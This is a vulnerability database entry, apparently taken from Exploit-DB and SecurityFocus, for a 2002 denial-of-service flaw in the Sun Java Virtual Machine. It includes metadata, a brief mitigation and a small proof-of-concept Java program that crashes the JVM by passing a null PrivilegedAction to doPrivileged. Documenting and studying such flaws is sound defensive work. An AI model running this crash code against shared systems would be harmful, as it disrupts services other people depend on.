vendor: Java Virtual Machine
by: SecurityFocus
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 20
Product Name: Java Virtual Machine
Affected Version From: 1.3.2001
Affected Version To: 1.4.2001
Patch Exists: YES
Related CWE: CVE-2002-0045
CPE: a:sun:java_virtual_machine
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

Sun Java Virtual Machine Denial of Service Vulnerability

It is possible for a maliciously constructed, valid Java program to crash the Sun JVM. This may result in a denial of service attack in a shared environment. The ability to consistently exploit this vulnerability has been demonstrated on the Linux version of the Sun JVM.

Mitigation:

Ensure that all Java programs are running in a secure environment and that all Java code is properly validated.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3992/info

Java programs run in an interpreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux.

It is possible for a maliciously constructed, valid Java program to crash the Sun JVM. This may result in a denial of service attack in a shared environment. The ability to consistently exploit this vulnerability has been demonstrated on the Linux version of the Sun JVM.

public class CrashMe
{
    public static void main(String[] args)
    {
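        // A null PrivilegedAction is passed to doPrivileged; this is the
        // only call in the program, and it crashes the affected Sun JVM.
        java.security.AccessController.doPrivileged
        ((java.security.PrivilegedAction)null);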
    }
}